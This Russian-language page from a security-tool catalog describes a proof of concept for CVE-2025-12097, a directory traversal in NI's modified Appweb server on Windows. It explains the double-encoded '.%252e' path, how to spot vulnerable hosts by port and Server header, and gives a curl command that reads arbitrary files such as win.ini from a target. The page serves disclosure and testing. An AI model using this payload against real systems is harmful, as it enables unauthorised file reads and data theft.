Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2025-12097 — Эксплойт для проверки концепции уязвимости CVE-2025-12097, обход каталогов в модифицированном сервере Appweb от NI, позволяющая произвольное чтение файлов на системах Windows. | Kitploit
Инструменты/GitHubGitHub/matejsmycka/poc-cve-2025-12097
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubmatejsmycka/poc-cve-2025-12097

PoC-CVE-2025-12097

Эксплойт для проверки концепции уязвимости CVE-2025-12097, обход каталогов в модифицированном сервере Appweb от NI, позволяющая произвольное чтение файлов на системах Windows.

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-12097

Описание

Модификация NI веб-сервера Appweb содержит уязвимость обхода каталогов, которая позволяет злоумышленнику читать произвольные файлы на сервере.

Путь URI /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini будет преобразован в:

pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 что является допустимым URI, и Appweb не блокирует этот запрос. Затем он передается пользовательскому обработчику, который в данном случае возвращает содержимое любого запрошенного файла.

Из-за природы затронутого программного обеспечения уязвимыми устройствами являются исключительно системы Microsoft Windows.

Наибольшая наблюдаемая уязвимая версия: 12.0.0.

Идентификация уязвимых устройств

Уязвимые устройства можно идентифицировать по следующим характеристикам:

Не всегда, но в большинстве случаев служба работает на порту 3580, другие порты могут включать 8080 и 80.

Ответ сервера на /

root@kitploit:~
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126

<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>

PoC

Для эксплуатации этой уязвимости вы можете использовать следующую команду:

root@kitploit:~
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini

Если цель уязвима, вы увидите содержимое файла win.ini.

Скачать инструмент